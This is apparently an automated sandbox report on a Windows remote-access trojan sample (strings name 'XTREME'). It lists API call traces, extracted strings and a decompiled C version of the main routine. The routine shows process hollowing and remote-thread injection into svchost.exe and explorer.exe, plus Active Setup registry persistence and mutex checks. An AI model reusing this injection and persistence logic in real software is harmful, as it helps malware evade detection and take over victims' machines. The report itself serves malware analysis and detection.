Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(019E0000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(019E0000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

.xtr, xrefs: 00C8A3C2
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
XTREME, xrefs: 00C8A42F
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
%DEFAULTBROWSER%, xrefs: 00C8A208
svchost.exe, xrefs: 00C8A196
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
Mutex, xrefs: 00C8A489
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
SOFTWARE\, xrefs: 00C8A472
local, xrefs: 00C8A3EF
C:\Windows\InstallDir\, xrefs: 00C8A156
explorer.exe, xrefs: 00C8A383
InstalledServer, xrefs: 00C8A0D9
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
DSma9HnKaPERSIST, xrefs: 00C8A16F
SOFTWARE\, xrefs: 00C8A0CD
DSma9HnKa, xrefs: 00C8A0C8

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8A0A2, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 222
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00C8A0A2(void* __edx, void* __eflags) {
				short* _t14;
				short* _t16;
				short* _t19;
				short* _t25;
				short* _t35;
				intOrPtr _t51;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t63;
				void* _t65;
				void* _t67;
				long _t68;
				short* _t77;
				int* _t79;
				void* _t81;
				int* _t84;
				void* _t86;
				intOrPtr _t88;
				int* _t90;
				void* _t92;
				intOrPtr _t94;
				void* _t96;
				intOrPtr* _t103;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t139;
				void* _t140;
				void* _t141;
				intOrPtr _t143;
				intOrPtr _t146;
				intOrPtr _t150;
				WCHAR* _t153;
				intOrPtr _t161;
				void* _t167;
				signed int _t170;
				short* _t199;
				intOrPtr _t204;
				intOrPtr _t206;
				intOrPtr* _t210;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t235;
				WCHAR* _t240;
				void* _t243;
				void* _t244;
				void* _t247;
				void* _t249;

				_t247 = __eflags;
				E00C814F0();
				_t14 =  *0xc8f898; // 0xc30000
				E00C83674(_t14);
				_t16 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t16, _t247));
				_t19 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t247), _t247, 2, _t19); // executed
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t240 = 0xc8ec8a;
				_t25 =  *0xc8f898; // 0xc30000
				E00C82E48(_t25);
				_t199 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t199);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t247));
				E00C82914(0xc91b06, _t30);
				_t35 =  *0xc8f898; // 0xc30000
				_t170 = E00C836D8(_t35, _t247);
				E00C82E48(_t170);
				E00C82914(0xc916f2, _t170);
				if( *0xc8f38a == 1) {
					_t153 = E00C8263C(0, 0, "DSma9HnKaPERSIST"); // executed
					_t240 = _t153;
					_t249 = GetLastError() - 0xb7;
					if(_t249 == 0) {
						CloseHandle(_t240);
					} else {
						CloseHandle(_t240);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t249);
						E00C8291C();
						_t161 =  *0xc8f89c; // 0x19a0000
						E00C82E48(_t161);
						_t235 =  *0xc8f89c; // 0x19a0000
						E00C82914(0xc8fac0, _t235);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
						_t167 =  *0xc8f8ac; // 0x17c
						E00C83CE4(_t167, 0xc8fccc, E00C88EF8);
					}
				}
				E00C81CD8(_t244 - 0x1838, 0x11, 0xc8f2b2);
				_t204 =  *0xc8b0dc; // 0x0
				E00C81DBC( *((intOrPtr*)(_t244 - 0x1838)), _t204);
				if(_t249 != 0) {
					E00C81CD8(_t244 - 0x183c, 0x11, 0xc8f2b2);
					_t206 =  *0xc8b0d8; // 0x0
					E00C81DBC( *((intOrPtr*)(_t244 - 0x183c)), _t206);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t51 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t51, 0xc91f1c, _t244);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t139 =  *0xc8f89c; // 0x19a0000
							_t140 = E00C83A54(_t139, 0xc8f8ac);
							__eflags = _t140;
							if(_t140 != 0) {
								_t141 =  *0xc8f8ac; // 0x17c
								 *0xc8f89c = E00C83B10(_t141);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t143 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t143, 0xc91f1c, _t244);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t146 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t146, 0xc91f1c, _t244);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t150 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t150, 0xc91f1c, _t244);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t243 = 0;
				 *0xc8f8a8 = 0;
				_t250 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t170 =  *0xc8f898; // 0xc30000
					_t240 = E00C833A8(E00C83420(0, _t170, 0), 0xc8a704, _t250);
					if(E00C83960(_t170, E00C82E48(_t170), _t240) == 0) {
						SetFileAttributesW(_t240, 0x80);
						_t252 = E00C82E48(_t240) + _t132;
						E00C82914(0xc91d10, _t240);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t240) + _t132), 0xc91f1c, _t244), 0xc91d10, E00C897F4);
					}
				}
				_t56 = E00C833A8(E00C836D8(0xc918fc, _t252), 0xc90fdc, _t252);
				_t210 =  *0xc8b0f0; // 0xc8e01c
				 *_t210 = _t56;
				_t57 =  *0xc8b0f0; // 0xc8e01c
				_t59 = E00C833A8( *_t57, L".xtr", _t252);
				_t212 =  *0xc8b0f0; // 0xc8e01c
				 *_t212 = _t59;
				_t60 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t60) != 0 && E00C87B84(L"local", _t170, _t243) == 1) {
					_t255 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
					}
					_t216 =  *0xc8b0e4; // 0xc8e024
					_t103 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t103, _t170, L"XTREME",  *_t216 - 0x1e, _t240, _t243, _t255);
					E00C82E14(_t244 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t244 - 0x1840,  *((intOrPtr*)(_t244 - 0x1844)), L"SOFTWARE\\", _t255);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t244 - 0x1840))), _t255, 2, "DSma9HnKa");
					_t115 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t115);
					_t117 =  *0xc8b0e8; // 0xc8e020
					_t212 = 0;
					E00C84600( *_t117, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t257 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t63 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t63);
					while(1) {
						_t213 = E00C88BC0;
						_t65 =  *0xc8f8ac; // 0x17c
						 *0xc8f8a8 = E00C83CE4(_t65, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4); // executed
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t90 =  *0xc8b0e0; // 0xc8b000
							_t92 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t92,  *_t90);
							_t213 = 0xc91f1c;
							_t94 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t94, 0xc91f1c, _t244);
						}
						_t243 = _t243 + 1;
						_t67 = E00C8263C(0, 0, "DSma9HnKa"); // executed
						_t241 = _t67;
						_t68 = GetLastError();
						__eflags = _t68 - 0xb7;
						_t170 = _t170 & 0xffffff00 | _t68 == 0x000000b7;
						CloseHandle(_t67);
						__eflags = _t170;
						if(_t170 == 0) {
							_t84 =  *0xc8b0e0; // 0xc8b000
							_t86 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t86,  *_t84);
							_t213 = 0xc91f1c;
							_t88 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t88, 0xc91f1c, _t244);
						}
						__eflags = _t243 - 7;
						if(_t243 >= 7) {
							break;
						}
						__eflags = _t170 - 1;
						if(_t170 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t170, _t213, _t241, _t243); // executed
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t79 =  *0xc8b0e0; // 0xc8b000
						_t81 =  *0xc8f8ac; // 0x17c
						TerminateProcess(_t81,  *_t79);
						E00C88BC0(_t170, _t241, _t243, __eflags, 0xc8fccc);
					}
					__eflags = _t243 - 7;
					if(_t243 >= 7) {
						__eflags = _t170;
						if(_t170 == 0) {
							_t77 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t77, 0, 0, 0);
						}
					}
					goto L38;
				} else {
					_t96 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t96);
					E00C840F8(0xc8e07c, _t170, _t212, _t240, _t243);
					E00C88BC0(_t170, _t240, _t243, _t257, 0xc8fccc);
					L38:
					_pop(_t214);
					 *[fs:eax] = _t214;
					_push(0xc8a632);
					E00C81B90(_t244 - 0x1844, 5);
					return E00C81B78(_t244 - 0x14);
				}
			}

0x00c8a0a2
0x00c8a0a2
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
